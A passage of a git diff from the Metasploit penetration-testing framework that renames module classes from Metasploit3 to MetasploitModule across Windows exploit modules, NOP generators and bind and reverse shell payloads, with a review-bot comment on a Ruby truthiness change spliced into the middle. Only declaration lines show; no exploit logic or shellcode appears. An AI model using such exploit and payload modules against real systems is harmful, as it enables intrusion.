--- a/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb +++ b/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/smtp/njstar_smtp_bof.rb b/modules/exploits/windows/smtp/njstar_smtp_bof.rb index bbf06483f1..adcc1d5461 100644 --- a/modules/exploits/windows/smtp/njstar_smtp_bof.rb +++ b/modules/exploits/windows/smtp/njstar_smtp_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/smtp/wmailserver.rb b/modules/exploits/windows/smtp/wmailserver.rb index 6d393979a1..6f91626838 100644 --- a/modules/exploits/windows/smtp/wmailserver.rb +++ b/modules/exploits/windows/smtp/wmailserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/smtp/ypops_overflow1.rb b/modules/exploits/windows/smtp/ypops_overflow1.rb index 3b8450c140..a0b88194a5 100644 --- a/modules/exploits/windows/smtp/ypops_overflow1.rb +++ b/modules/exploits/windows/smtp/ypops_overflow1.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Smtp diff --git a/modules/exploits/windows/ssh/freeftpd_key_exchange.rb b/modules/exploits/windows/ssh/freeftpd_key_exchange.rb index d851559c2c..922a163785 100644 --- a/modules/exploits/windows/ssh/freeftpd_key_exchange.rb +++ b/modules/exploits/windows/ssh/freeftpd_key_exchange.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ssh/freesshd_authbypass.rb b/modules/exploits/windows/ssh/freesshd_authbypass.rb index e53bb028ea..07333700de 100644 --- a/modules/exploits/windows/ssh/freesshd_authbypass.rb +++ b/modules/exploits/windows/ssh/freesshd_authbypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ssh/freesshd_key_exchange.rb b/modules/exploits/windows/ssh/freesshd_key_exchange.rb index 57e154860a..4204c26d58 100644 --- a/modules/exploits/windows/ssh/freesshd_key_exchange.rb +++ b/modules/exploits/windows/ssh/freesshd_key_exchange.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ssh/putty_msg_debug.rb b/modules/exploits/windows/ssh/putty_msg_debug.rb index 73b305f2a4..117a781436 100644 --- a/modules/exploits/windows/ssh/putty_msg_debug.rb +++ b/modules/exploits/windows/ssh/putty_msg_debug.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ssh/securecrt_ssh1.rb b/modules/exploits/windows/ssh/securecrt_ssh1.rb index df985f1448..fd8cfaf959 100644 --- a/modules/exploits/windows/ssh/securecrt_ssh1.rb +++ b/modules/exploits/windows/ssh/securecrt_ssh1.rb 
@@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ssh/sysax_ssh_username.rb b/modules/exploits/windows/ssh/sysax_ssh_username.rb index 4f9dde83ce..344a6e8ba6 100644 --- a/modules/exploits/windows/ssh/sysax_ssh_username.rb +++ b/modules/exploits/windows/ssh/sysax_ssh_username.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ssl/ms04_011_pct.rb b/modules/exploits/windows/ssl/ms04_011_pct.rb index 9a437f9cab..278eebb500 100644 --- a/modules/exploits/windows/ssl/ms04_011_pct.rb +++ b/modules/exploits/windows/ssl/ms04_011_pct.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb index 3106ce456d..4f7ccaf5fc 100644 --- a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb +++ b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh diff --git a/modules/exploits/windows/telnet/goodtech_telnet.rb b/modules/exploits/windows/telnet/goodtech_telnet.rb index ea55e3c541..05787a086f 100644 --- a/modules/exploits/windows/telnet/goodtech_telnet.rb +++ b/modules/exploits/windows/telnet/goodtech_telnet.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/tftp/attftp_long_filename.rb b/modules/exploits/windows/tftp/attftp_long_filename.rb index 9f54353a9c..5e870c2a45 100644 --- a/modules/exploits/windows/tftp/attftp_long_filename.rb +++ b/modules/exploits/windows/tftp/attftp_long_filename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/distinct_tftp_traversal.rb b/modules/exploits/windows/tftp/distinct_tftp_traversal.rb index 49588e2655..117490b420 100644 --- a/modules/exploits/windows/tftp/distinct_tftp_traversal.rb +++ b/modules/exploits/windows/tftp/distinct_tftp_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Rex::Proto::TFTP diff --git a/modules/exploits/windows/tftp/dlink_long_filename.rb b/modules/exploits/windows/tftp/dlink_long_filename.rb index c8d78b0862..1809d64ee3 100644 --- a/modules/exploits/windows/tftp/dlink_long_filename.rb +++ b/modules/exploits/windows/tftp/dlink_long_filename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/futuresoft_transfermode.rb b/modules/exploits/windows/tftp/futuresoft_transfermode.rb index 410c818099..27117793e5 100644 --- a/modules/exploits/windows/tftp/futuresoft_transfermode.rb +++ b/modules/exploits/windows/tftp/futuresoft_transfermode.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/netdecision_tftp_traversal.rb b/modules/exploits/windows/tftp/netdecision_tftp_traversal.rb index 0e3e0d5811..935f681953 100644 --- a/modules/exploits/windows/tftp/netdecision_tftp_traversal.rb +++ b/modules/exploits/windows/tftp/netdecision_tftp_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Rex::Proto::TFTP diff --git a/modules/exploits/windows/tftp/opentftp_error_code.rb b/modules/exploits/windows/tftp/opentftp_error_code.rb index 0949f8ff23..fa1734b983 100644 --- a/modules/exploits/windows/tftp/opentftp_error_code.rb +++ b/modules/exploits/windows/tftp/opentftp_error_code.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb b/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb index 2183c12283..57e3bfa02b 100644 --- a/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb +++ b/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/tftpd32_long_filename.rb b/modules/exploits/windows/tftp/tftpd32_long_filename.rb index 119de0ce1a..62659e76db 100644 --- a/modules/exploits/windows/tftp/tftpd32_long_filename.rb +++ b/modules/exploits/windows/tftp/tftpd32_long_filename.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/tftpdwin_long_filename.rb b/modules/exploits/windows/tftp/tftpdwin_long_filename.rb index 75131b6e09..436e4b922e 100644 --- a/modules/exploits/windows/tftp/tftpdwin_long_filename.rb +++ b/modules/exploits/windows/tftp/tftpdwin_long_filename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb b/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb index 3cbd5bf1d0..b1ac37baa9 100644 --- a/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb +++ b/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb b/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb index a02cbb277c..5af0ab3918 100644 --- a/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb +++ b/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/unicenter/cam_log_security.rb b/modules/exploits/windows/unicenter/cam_log_security.rb index 4a673fd767..3616ae558c 100644 --- a/modules/exploits/windows/unicenter/cam_log_security.rb +++ b/modules/exploits/windows/unicenter/cam_log_security.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/vnc/realvnc_client.rb b/modules/exploits/windows/vnc/realvnc_client.rb index a479580f78..aa4f88043f 100644 --- a/modules/exploits/windows/vnc/realvnc_client.rb +++ b/modules/exploits/windows/vnc/realvnc_client.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/vnc/ultravnc_client.rb b/modules/exploits/windows/vnc/ultravnc_client.rb index 4fd21103e0..9b513c571a 100644 --- a/modules/exploits/windows/vnc/ultravnc_client.rb +++ b/modules/exploits/windows/vnc/ultravnc_client.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb b/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb index 2822427e85..6ed96a1fab 100644 --- a/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb +++ b/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/vnc/winvnc_http_get.rb b/modules/exploits/windows/vnc/winvnc_http_get.rb index 26bb1236d2..b632b9c800 100644 --- a/modules/exploits/windows/vnc/winvnc_http_get.rb +++ b/modules/exploits/windows/vnc/winvnc_http_get.rb 
@@ -6,7 +6,7 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote + class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/vpn/safenet_ike_11.rb b/modules/exploits/windows/vpn/safenet_ike_11.rb index 24c94599c7..d6edf7d1fe 100644 --- a/modules/exploits/windows/vpn/safenet_ike_11.rb +++ b/modules/exploits/windows/vpn/safenet_ike_11.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/winrm/winrm_script_exec.rb b/modules/exploits/windows/winrm/winrm_script_exec.rb index 71d8a1c447..ca878da289 100644 --- a/modules/exploits/windows/winrm/winrm_script_exec.rb +++ b/modules/exploits/windows/winrm/winrm_script_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::WinRM diff --git a/modules/exploits/windows/wins/ms04_045_wins.rb b/modules/exploits/windows/wins/ms04_045_wins.rb index 4d7028f656..c47f62277d 100644 --- a/modules/exploits/windows/wins/ms04_045_wins.rb +++ b/modules/exploits/windows/wins/ms04_045_wins.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/nops/armle/simple.rb b/modules/nops/armle/simple.rb index a2ba2e1f56..2470ee3f38 100644 --- a/modules/nops/armle/simple.rb +++ b/modules/nops/armle/simple.rb @@ -15,7 +15,7 @@ require 'msf/core' # This class implements simple NOP generator for ARM (little endian) # ### -class Metasploit3 < Msf::Nop +class MetasploitModule < Msf::Nop def initialize diff --git a/modules/nops/php/generic.rb b/modules/nops/php/generic.rb index 0498fd6817..272d16448c 100644 
--- a/modules/nops/php/generic.rb +++ b/modules/nops/php/generic.rb @@ -12,7 +12,7 @@ require 'msf/core' # This class implements a "nop" generator for PHP payloads # ### -class Metasploit3 < Msf::Nop +class MetasploitModule < Msf::Nop def initialize super( diff --git a/modules/nops/ppc/simple.rb b/modules/nops/ppc/simple.rb index 73e0f0f4ed..8517b9dc33 100644 --- a/modules/nops/ppc/simple.rb +++ b/modules/nops/ppc/simple.rb @@ -15,7 +15,7 @@ require 'msf/core' # This class implements simple NOP generator for PowerPC # ### -class Metasploit3 < Msf::Nop +class MetasploitModule < Msf::Nop def initialize diff --git a/modules/nops/sparc/random.rb b/modules/nops/sparc/random.rb index 6227cf4c38..c88aaa81df 100644 --- a/modules/nops/sparc/random.rb +++ b/modules/nops/sparc/random.rb @@ -15,7 +15,7 @@ require 'msf/core' # This class implements NOP generator for the SPARC platform # ### -class Metasploit3 < Msf::Nop +class MetasploitModule < Msf::Nop # Nop types InsSethi = 0 diff --git a/modules/nops/tty/generic.rb b/modules/nops/tty/generic.rb index 26f9189a55..1e6a2b501e 100644 --- a/modules/nops/tty/generic.rb +++ b/modules/nops/tty/generic.rb @@ -12,7 +12,7 @@ require 'msf/core' # This class implements a "nop" generator for TTY payloads # ### -class Metasploit3 < Msf::Nop +class MetasploitModule < Msf::Nop def initialize super( diff --git a/modules/nops/x64/simple.rb b/modules/nops/x64/simple.rb index 765a636309..8af416a2d5 100644 --- a/modules/nops/x64/simple.rb +++ b/modules/nops/x64/simple.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Nop +class MetasploitModule < Msf::Nop def initialize super( diff --git a/modules/nops/x86/opty2.rb b/modules/nops/x86/opty2.rb index d45d90434e..609a618615 100644 --- a/modules/nops/x86/opty2.rb +++ b/modules/nops/x86/opty2.rb @@ -17,7 +17,7 @@ require 'rex/nop/opty2' # ADMmutate and from spoonfu. # ### -class Metasploit3 < Msf::Nop +class MetasploitModule < Msf::Nop def initialize super( 
diff --git a/modules/nops/x86/single_byte.rb b/modules/nops/x86/single_byte.rb index 3607aa361f..4b0242cbb0 100644 --- a/modules/nops/x86/single_byte.rb +++ b/modules/nops/x86/single_byte.rb @@ -13,7 +13,7 @@ require 'msf/core' # ADMmutate and from spoonfu. # ### -class Metasploit3 < Msf::Nop +class MetasploitModule < Msf::Nop SINGLE_BYTE_SLED = { @@ -106,7 +106,7 @@ SINGLE_BYTE_SLED = # Did someone specify random NOPs in the environment? if (!random and datastore['RandomNops']) - random = (datastore['RandomNops'].match(/true|1|y/i) != nil) + random = datastore['RandomNops'] end # Generate the whole sled... diff --git a/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb b/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb index a1b09fcc1c..7e48e83f2d 100644 --- a/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb +++ b/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 264 diff --git a/modules/payloads/singles/aix/ppc/shell_find_port.rb b/modules/payloads/singles/aix/ppc/shell_find_port.rb index 10f3ca4167..0b7e38ba16 100644 --- a/modules/payloads/singles/aix/ppc/shell_find_port.rb +++ b/modules/payloads/singles/aix/ppc/shell_find_port.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_port' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 220 diff --git a/modules/payloads/singles/aix/ppc/shell_interact.rb b/modules/payloads/singles/aix/ppc/shell_interact.rb index 24832f647c..ac97edec4e 100644 --- a/modules/payloads/singles/aix/ppc/shell_interact.rb +++ b/modules/payloads/singles/aix/ppc/shell_interact.rb 
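Review bot: The new assignment `random = datastore['RandomNops']` in the `@@ -106,7 +106,7 @@` hunk of modules/nops/x86/single_byte.rb matches the removed regex check only if the datastore returns a real boolean. In Ruby the strings `"false"` and `"0"` are truthy, and the enclosing `if (!random and datastore['RandomNops'])` tests the same value, so a string-valued setting would always enable random sleds, whereas the old code could still yield `false`. The option's registration is outside the hunk, so it cannot be confirmed here that it is an `OptBool` whose value the datastore normalizes. If that is not guaranteed, keep an explicit coercion such as `random = !!(datastore['RandomNops'].to_s =~ /\A(?:true|1|y)/i)`; otherwise record the assumption with a comment like `# RandomNops is an OptBool; the datastore returns true/false here`. The enclosing method starts and ends outside the hunk.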
@@ -8,7 +8,7 @@ require 'msf/core/handler/find_shell' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 56 diff --git a/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb b/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb index 44c3fe9367..ef6c85201a 100644 --- a/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 204 diff --git a/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb b/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb index f4f42719c9..06b08fb63e 100644 --- a/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb +++ b/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 164 diff --git a/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb b/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb index 1143cf23b8..1df2e6ee8d 100644 --- a/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 128 diff --git a/modules/payloads/singles/bsd/x64/exec.rb b/modules/payloads/singles/bsd/x64/exec.rb index 150d96f356..973ae31ab4 100644 --- a/modules/payloads/singles/bsd/x64/exec.rb +++ b/modules/payloads/singles/bsd/x64/exec.rb 
@@ -15,7 +15,7 @@ require 'msf/core' # Executes an arbitrary command. # ### -module Metasploit3 +module MetasploitModule CachedSize = 31 diff --git a/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb b/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb index c6a5ff3f38..6c0d2ee0fc 100644 --- a/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb +++ b/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 90 diff --git a/modules/payloads/singles/bsd/x64/shell_bind_tcp.rb b/modules/payloads/singles/bsd/x64/shell_bind_tcp.rb index 9528c88233..cbfe962089 100644 --- a/modules/payloads/singles/bsd/x64/shell_bind_tcp.rb +++ b/modules/payloads/singles/bsd/x64/shell_bind_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 136 diff --git a/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb b/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb index 8d92cadcb6..8bff2170e3 100644 --- a/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb +++ b/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 88 diff --git a/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb b/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb index 368d6f9666..0c4d3612ff 100644 --- a/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb 
@@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 105 diff --git a/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb b/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb index fece7de959..490f67d140 100644 --- a/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb +++ b/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 108 diff --git a/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb b/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb index 98ef6fb778..77b0e61099 100644 --- a/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb +++ b/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 81 diff --git a/modules/payloads/singles/bsd/x86/exec.rb b/modules/payloads/singles/bsd/x86/exec.rb index eee7aebbd9..d95199cebd 100644 --- a/modules/payloads/singles/bsd/x86/exec.rb +++ b/modules/payloads/singles/bsd/x86/exec.rb @@ -15,7 +15,7 @@ require 'msf/core' # Executes an arbitrary command. # ### -module Metasploit3 +module MetasploitModule CachedSize = 24 diff --git a/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb b/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb index f8352a26de..ee7e1c55e2 100644 --- a/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb +++ b/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/meterpreter_x86_bsd' require 'msf/base/sessions/meterpreter_options' -module Metasploit3 +module MetasploitModule CachedSize = 0 
diff --git a/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb b/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb index 722c4f71f6..73af2e47f9 100644 --- a/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb +++ b/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/meterpreter_x86_bsd' require 'msf/base/sessions/meterpreter_options' -module Metasploit3 +module MetasploitModule CachedSize = 0 diff --git a/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb b/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb index 51c42e0b2a..5e2b8ba269 100644 --- a/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 73 diff --git a/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb b/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb index 364b19f021..91287cd4a0 100644 --- a/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb +++ b/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 87 diff --git a/modules/payloads/singles/bsd/x86/shell_find_port.rb b/modules/payloads/singles/bsd/x86/shell_find_port.rb index 80f4aa6955..0cb7111680 100644 --- a/modules/payloads/singles/bsd/x86/shell_find_port.rb +++ b/modules/payloads/singles/bsd/x86/shell_find_port.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_port' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 60 
diff --git a/modules/payloads/singles/bsd/x86/shell_find_tag.rb b/modules/payloads/singles/bsd/x86/shell_find_tag.rb index 389ff04691..7cec06f54b 100644 --- a/modules/payloads/singles/bsd/x86/shell_find_tag.rb +++ b/modules/payloads/singles/bsd/x86/shell_find_tag.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_tag' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 70 diff --git a/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb b/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb index a1be7400f4..f7f2c2a538 100644 --- a/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 64 diff --git a/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb b/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb index 3de4c6b8ba..19d50fe386 100644 --- a/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb +++ b/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 96 diff --git 